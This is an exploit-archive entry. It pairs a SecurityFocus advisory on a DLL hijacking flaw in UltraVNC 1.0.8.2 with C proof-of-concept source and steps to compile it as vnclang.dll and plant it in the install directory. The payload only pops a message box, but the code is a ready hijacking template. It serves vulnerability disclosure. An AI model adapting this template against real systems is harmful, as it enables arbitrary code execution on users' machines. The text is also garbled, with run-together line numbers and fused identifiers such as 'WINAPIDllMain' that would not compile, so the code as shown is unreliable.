1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 |
// source: https://www.securityfocus.com/bid/42846/info UltraVNC is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. UltraVNC 1.0.8.2 is vulnerable; other versions may be affected. /* ==================================================================== UltraVNC Viewer - Connection 105 DLL Hijacking Exploit (vnclang.dll) ==================================================================== $ Program: UltraVNC Viewer $ Version: Connection 105 $ Download: http://www.uvnc.com/ $ Date: 2010/10/08 Found by Pepelux <pepelux[at]enye-sec.org> http://www.pepelux.org eNYe-Sec - www.enye-sec.org Tested on: Windows XP SP2 && Windows XP SP3 Howto use : 1> Compile this code as vnclang.dll gcc -shared -o vnclang.dll thiscode.c 2> Move DLL file to the directory where UltraVNC is installed 3> Open any file recognized by UltraVNC */ #include <windows.h> #define DllExport __declspec (dllexport) int mes() { MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK); return 0; } BOOL WINAPIDllMain ( HANDLEhinstDLL, DWORD fdwReason, LPVOIDlpvReserved) {mes();} |